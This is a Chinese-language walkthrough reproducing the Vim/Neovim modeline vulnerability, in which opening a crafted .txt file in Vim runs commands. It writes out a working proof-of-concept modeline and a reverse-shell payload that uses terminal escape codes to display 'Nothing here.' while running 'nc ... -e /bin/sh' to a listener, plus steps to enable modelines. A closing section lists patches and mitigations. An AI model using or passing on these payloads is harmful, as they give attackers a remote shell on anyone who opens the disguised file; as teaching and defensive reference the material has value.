一个txt文本拿下你的shell(害怕)

这里我就我自己的复现经历给大家演示一下。

git clone https://github.com/numirias/security.git

0x01：复现

1、kali复现

    桌面新建立一个poc.txt放入以下代码，并用vim执行。

  代码：

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

效果图：

一个txt文本拿下你的shell(害怕)

成功执行

    反弹shell脚本

    新建立一个shell.txt放入以下代码，Ip跟端口改成你自己的，并用vim执行。

    代码：

\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 192.168.124.14 6666 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n

执行后报错：

一个txt文本拿下你的shell(害怕)

提示：处理模型行时检测到错误！！

处理方式：

一个txt文本拿下你的shell(害怕)
一个txt文本拿下你的shell(害怕)

在50行这里添加一个“set modeline” 然后esc保存退出，然后执行

source ~/.vimrc让它生效。

本地开启监听

一个txt文本拿下你的shell(害怕)

kali用vim执行txt

一个txt文本拿下你的shell(害怕)

本机得到shell

一个txt文本拿下你的shell(害怕)

0x02:防范

Vim补丁8.1.1365

https://github.com/vim/vim/commit/5357552

Neovim补丁（在v0.3.6中发布）

https://github.com/neovim/neovim/pull/10082

https://github.com/neovim/neovim/releases/tag/v0.3.6

    除了修补之外，建议在vimrc（set nomodeline）中禁用model，使用securemodelines 插件，或者禁用modelineexpr（因为补丁8.1.1366，仅限Vim）以禁用model中的表达式。